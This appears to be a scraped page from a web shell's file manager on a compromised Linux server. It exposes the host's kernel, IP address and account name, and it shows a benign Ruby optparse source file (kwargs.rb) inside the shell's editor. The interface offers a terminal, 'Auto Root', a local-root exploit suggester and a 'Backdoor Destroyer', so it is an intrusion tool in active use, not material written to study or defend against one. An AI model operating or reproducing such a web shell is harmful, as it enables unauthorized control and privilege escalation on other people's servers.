Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ruby /
optparse /
Delete
Unzip
Name
Size
Permission
Date
Action
ac.rb
1.99
KB
-rw-r--r--
2025-10-15 22:19
date.rb
368
B
-rw-r--r--
2025-10-15 22:19
kwargs.rb
716
B
-rw-r--r--
2025-10-15 22:19
shellwords.rb
164
B
-rw-r--r--
2025-10-15 22:19
time.rb
231
B
-rw-r--r--
2025-10-15 22:19
uri.rb
143
B
-rw-r--r--
2025-10-15 22:19
version.rb
2.14
KB
-rw-r--r--
2025-10-15 22:19
Save
Rename
# frozen_string_literal: true require_relative '../optparse' class OptionParser # :call-seq: # define_by_keywords(options, method, **params) # # :include: ../../doc/optparse/creates_option.rdoc # # Defines options which set in to _options_ for keyword parameters # of _method_. # # Parameters for each keywords are given as elements of _params_. # def define_by_keywords(options, method, **params) method.parameters.each do |type, name| case type when :key, :keyreq op, cl = *(type == :key ? %w"[ ]" : ["", ""]) define("--#{name}=#{op}#{name.upcase}#{cl}", *params[name]) do |o| options[name] = o end end end options end end